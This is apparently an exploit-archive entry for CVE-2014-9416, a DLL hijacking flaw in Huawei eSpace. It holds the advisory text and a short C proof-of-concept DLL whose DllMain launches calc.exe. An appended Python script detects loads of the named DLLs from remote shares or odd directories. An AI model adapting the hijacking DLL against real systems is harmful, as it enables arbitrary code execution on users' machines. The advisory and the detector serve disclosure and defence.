53 lines
No EOL
1.6 KiB
C
/*

Huawei eSpace Desktop DLL Hijacking Vulnerability


Vendor: Huawei Technologies Co., Ltd.
Product web page: https://www.huawei.com
Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)

Summary: Create more convenient Enhanced Communications (EC) services for your
enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
voice, data, video, and service streams, and provides users with easy and secure
access to their service platform from any device, in any place, at any time. The
eSpace Meeting allows you to join meetings that support voice, data, and video
functions using the PC client, the tablet client, or an IP phone, or in a meeting
room with an MT deployed.

Desc: eSpace suffers from a DLL Hijacking issue. The vulnerability is caused due
to the application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and
airpcap.dll) in an insecure manner. This can be exploited to load arbitrary libraries
by tricking a user into opening a related application file (.html, .jpg, .png)
located on a remote WebDAV or SMB share.

Tested on: Microsoft Windows 7 Professional


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

19.08.2014

Patched version: V200R003C00
Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154
CVE ID: CVE-2014-9416
Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589

*/


// gcc -shared -o mfc71enu.dll exploit.c

#include <windows.h>

// Forward declaration: exec() is defined after DllMain.
int exec(void);

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
	exec();
	return 0;
}

int exec(void)
{
	WinExec("calc.exe", SW_NORMAL);
	return 0;
}
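
A detection-side check for the loading behaviour described in the advisory, as an added example that is not part of the original file: it scans image-load telemetry (for example Sysmon Event ID 7 records reduced to process/DLL pairs) for the four DLL names arriving from a remote share or an unexpected local directory. The event tuples, paths, host names and the trusted-directory rule are constructed assumptions.

```python
import ntpath

# DLL names listed in the advisory's description.
WATCHED_DLLS = {"mfc71enu.dll", "mfc71loc.dll", "tcapi.dll", "airpcap.dll"}
# Assumption: the default Windows system directories count as trusted load locations.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")


def is_remote(path):
    """True for UNC paths, which covers SMB shares and WebDAV redirector paths."""
    return ntpath.normpath(path).startswith("\\\\")


def classify_load(process_image, loaded_dll):
    """Return None for an expected load, otherwise a short reason string."""
    dll = ntpath.normpath(loaded_dll).lower()
    if ntpath.basename(dll) not in WATCHED_DLLS:
        return None
    if is_remote(dll):
        return "watched DLL loaded from a remote share"
    dll_dir = ntpath.dirname(dll)
    app_dir = ntpath.dirname(ntpath.normpath(process_image).lower())
    if dll_dir == app_dir or dll_dir in SYSTEM_DIRS:
        return None
    return "watched DLL loaded from outside the application and system directories"


def find_suspicious_loads(events):
    """events: iterable of (process_image, loaded_dll) pairs from image-load telemetry."""
    findings = []
    for process_image, loaded_dll in events:
        reason = classify_load(process_image, loaded_dll)
        if reason:
            findings.append((process_image, loaded_dll, reason))
    return findings


# Constructed sample events (hypothetical paths and host names, not from the advisory).
APP = r"C:\Program Files\ExampleApp\app.exe"
SAMPLE_EVENTS = [
    (APP, r"C:\Program Files\ExampleApp\mfc71enu.dll"),
    (APP, r"\\fileserver.example\share\docs\mfc71enu.dll"),
    (APP, r"\\dav.example@SSL\DavWWWRoot\pics\tcapi.dll"),
    (APP, r"C:\Users\alice\Downloads\airpcap.dll"),
    (APP, r"C:\Windows\System32\kernel32.dll"),
]

if __name__ == "__main__":
    for proc, dll, reason in find_suspicious_loads(SAMPLE_EVENTS):
        print(f"{dll} <- {proc}: {reason}")
```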